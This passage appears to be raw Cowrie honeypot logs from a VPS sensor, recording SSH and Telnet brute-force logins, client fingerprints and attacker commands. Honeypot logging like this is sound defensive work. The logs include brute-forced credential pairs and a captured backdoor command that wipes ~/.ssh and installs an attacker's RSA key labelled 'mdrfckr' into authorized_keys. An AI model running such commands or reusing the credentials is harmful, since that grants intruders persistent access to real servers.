03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:21:38.809991Z","src_ip":"212.227.235.229","session":"e9792f5fd28a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:21:38.873869Z","src_ip":"49.247.35.31","session":"297655d23e57"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:21:39.056044Z","src_ip":"134.199.174.250","session":"7972c18a9f6c"}
{"eventid":"cowrie.login.failed","username":"samsung","password":"samsung2025","message":"login attempt [samsung/samsung2025] failed","sensor":"my-vps","timestamp":"2025-09-08T13:21:39.343134Z","src_ip":"212.227.235.229","session":"e9792f5fd28a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:21:39.942481Z","src_ip":"49.247.35.31","session":"297655d23e57"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"1234567890","message":"login attempt [postgres/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-08T13:21:39.958845Z","src_ip":"134.199.174.250","session":"7972c18a9f6c"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:21:40.468116Z","src_ip":"212.227.235.229","session":"e9792f5fd28a"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:21:41.224993Z","src_ip":"49.247.35.31","session":"297655d23e57"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:21:41.256686Z","src_ip":"134.199.174.250","session":"7972c18a9f6c"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":2273,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b0d6c91deef","protocol":"ssh","message":"New connection: 49.247.35.31:2273 (1.2.3.4:22) [session: 7b0d6c91deef]","sensor":"my-vps","timestamp":"2025-09-08T13:21:41.474498Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:21:41.477316Z","src_ip":"49.247.35.31","session":"7b0d6c91deef"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:21:41.741366Z","src_ip":"49.247.35.31","session":"7b0d6c91deef"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.149.186","src_port":40710,"dst_ip":"1.2.3.4","dst_port":23,"session":"95d0c6239d8d","protocol":"telnet","message":"New connection: 176.65.149.186:40710 (1.2.3.4:23) [session: 95d0c6239d8d]","sensor":"my-vps","timestamp":"2025-09-08T13:21:42.700366Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:21:42.737275Z","src_ip":"176.65.149.186","session":"95d0c6239d8d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:21:42.757625Z","src_ip":"176.65.149.186","session":"95d0c6239d8d"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-09-08T13:21:42.758900Z","src_ip":"176.65.149.186","session":"95d0c6239d8d"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-09-08T13:21:42.759768Z","src_ip":"176.65.149.186","session":"95d0c6239d8d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:21:42.761109Z","src_ip":"49.247.35.31","session":"7b0d6c91deef"}
{"eventid":"cowrie.session.closed","duration":"7.6","message":"Connection lost after 7.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:21:43.014318Z","src_ip":"49.247.35.31","session":"e5f49d7557c5"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:21:43.015432Z","src_ip":"49.247.35.31","session":"7b0d6c91deef"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":54580,"dst_ip":"1.2.3.4","dst_port":22,"session":"474982c0156e","protocol":"ssh","message":"New connection: 134.199.174.250:54580 (1.2.3.4:22) [session: 474982c0156e]","sensor":"my-vps","timestamp":"2025-09-08T13:22:08.224374Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:22:08.225095Z","src_ip":"134.199.174.250","session":"474982c0156e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:22:08.522653Z","src_ip":"134.199.174.250","session":"474982c0156e"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":56764,"dst_ip":"1.2.3.4","dst_port":22,"session":"6bf9648f2fc3","protocol":"ssh","message":"New connection: 139.59.14.27:56764 (1.2.3.4:22) [session: 6bf9648f2fc3]","sensor":"my-vps","timestamp":"2025-09-08T13:22:08.746764Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:22:08.747931Z","src_ip":"139.59.14.27","session":"6bf9648f2fc3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:22:09.062857Z","src_ip":"139.59.14.27","session":"6bf9648f2fc3"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"password1","message":"login attempt [postgres/password1] failed","sensor":"my-vps","timestamp":"2025-09-08T13:22:09.427688Z","src_ip":"134.199.174.250","session":"474982c0156e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37016,"dst_ip":"1.2.3.4","dst_port":22,"session":"3f139239ca73","protocol":"ssh","message":"New connection: 212.227.235.229:37016 (1.2.3.4:22) [session: 3f139239ca73]","sensor":"my-vps","timestamp":"2025-09-08T13:22:10.178909Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:22:10.182253Z","src_ip":"212.227.235.229","session":"3f139239ca73"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:22:10.726174Z","src_ip":"134.199.174.250","session":"474982c0156e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:22:10.794144Z","src_ip":"212.227.235.229","session":"3f139239ca73"}
{"eventid":"cowrie.login.success","username":"root","password":"kid","message":"login attempt [root/kid] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:22:11.249813Z","src_ip":"139.59.14.27","session":"6bf9648f2fc3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:22:11.932933Z","src_ip":"139.59.14.27","session":"6bf9648f2fc3"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:22:11.933634Z","src_ip":"139.59.14.27","session":"6bf9648f2fc3"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:22:11.934603Z","src_ip":"139.59.14.27","session":"6bf9648f2fc3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:22:12.250725Z","src_ip":"139.59.14.27","session":"6bf9648f2fc3"}
{"eventid":"cowrie.login.failed","username":"a","password":"123456789","message":"login attempt [a/123456789] failed","sensor":"my-vps","timestamp":"2025-09-08T13:22:12.401106Z","src_ip":"212.227.235.229","session":"3f139239ca73"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:22:12.948568Z","src_ip":"139.59.14.27","session":"6bf9648f2fc3"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:22:12.949279Z","src_ip":"139.59.14.27","session":"6bf9648f2fc3"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:22:13.268261Z","src_ip":"139.59.14.27","session":"6bf9648f2fc3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:22:13.269137Z","src_ip":"139.59.14.27","session":"6bf9648f2fc3"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:22:13.653477Z","src_ip":"212.227.235.229","session":"3f139239ca73"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":59590,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f0e882f9da0","protocol":"ssh","message":"New connection: 139.59.14.27:59590 (1.2.3.4:22) [session: 6f0e882f9da0]","sensor":"my-vps","timestamp":"2025-09-08T13:22:13.660066Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:22:13.660952Z","src_ip":"139.59.14.27","session":"6f0e882f9da0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:22:14.011717Z","src_ip":"139.59.14.27","session":"6f0e882f9da0"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:22:15.440823Z","src_ip":"139.59.14.27","session":"6f0e882f9da0"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:22:16.793684Z","src_ip":"139.59.14.27","session":"6f0e882f9da0"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":59600,"dst_ip":"1.2.3.4","dst_port":22,"session":"2592960f0802","protocol":"ssh","message":"New connection: 139.59.14.27:59600 (1.2.3.4:22) [session: 2592960f0802]","sensor":"my-vps","timestamp":"2025-09-08T13:22:17.061044Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:22:17.061686Z","src_ip":"139.59.14.27","session":"2592960f0802"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:22:17.364211Z","src_ip":"139.59.14.27","session":"2592960f0802"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:22:18.632468Z","src_ip":"139.59.14.27","session":"2592960f0802"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:22:18.934454Z","src_ip":"139.59.14.27","session":"2592960f0802"}
{"eventid":"cowrie.session.closed","duration":"10.2","message":"Connection lost after 10.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:22:18.935421Z","src_ip":"139.59.14.27","session":"6bf9648f2fc3"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":40854,"dst_ip":"1.2.3.4","dst_port":22,"session":"47516991d617","protocol":"ssh","message":"New connection: 134.199.174.250:40854 (1.2.3.4:22) [session: 47516991d617]","sensor":"my-vps","timestamp":"2025-09-08T13:22:37.810078Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:22:37.810922Z","src_ip":"134.199.174.250","session":"47516991d617"}
